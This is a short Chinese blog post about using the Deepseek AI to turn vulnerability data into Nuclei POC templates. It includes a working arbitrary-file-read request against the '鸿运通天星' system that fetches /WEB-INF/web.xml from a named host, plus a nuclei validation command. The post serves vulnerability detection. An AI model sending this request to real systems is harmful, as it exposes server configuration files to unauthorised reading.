让 Deepseek 帮我写 POC，又快又准确！

大家好，新年伊始，作为一个自由职业者，很多事情都需要自己一人完成，信安之路上线了 POC 管理系统，有大量漏洞需要转写成 Nuclei 所支持的 POC 模板文件，目前平台已收录四千多 POC 文件，还有不少 POC 未实现转换，如今 AI 的能力日渐强大，不依赖 AI 之力，作为科技从业者，也说不过去。

在 AI 领域，Deepseek 的横空出世，引起不少社会关注，今天尝试使用其，帮我完成 POC 的编写，发现效果非常不错，只需要告知其目标，即可为我提供结果。

以鸿运通天星系统的任意文件读取漏洞为例：

下面是一个鸿运通天星系统的任意文件读取漏的数据包，如果返回内容中包括 <web-app 则认为该漏洞存在，请编写一个完整的模板：

GET /StandardApiAction_downLoad.action?path=/WEB-INF/web.xml HTTP/1.1
Host: tg.xazlsec.ru:8080
Content-Length: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Deepseek 直接将写好的 POC 告知，并进行了解释，如下：

image-20250213172028757

将结果中的 poc 保存到本地，先不看测试效果，先看看 poc 有没有语法错误，使用参数验证一下：

nuclei -duc -t hongyun-arbitrary-file-read.yaml -validate

image-20250213172141250

测试无语法错误，那么尝试是否可以正确发现漏洞：

image-20250213172309569

最终发现漏洞存在，poc 无任何问题，所以直接使用 Deepseek 进行 POC 编写无任何问题，后面可以通过调用 API 完成自动化，为其提供数据包和验证方式，即可完成 POC 的编写，真正做到借助 AI 之力，达到事半功倍的效果。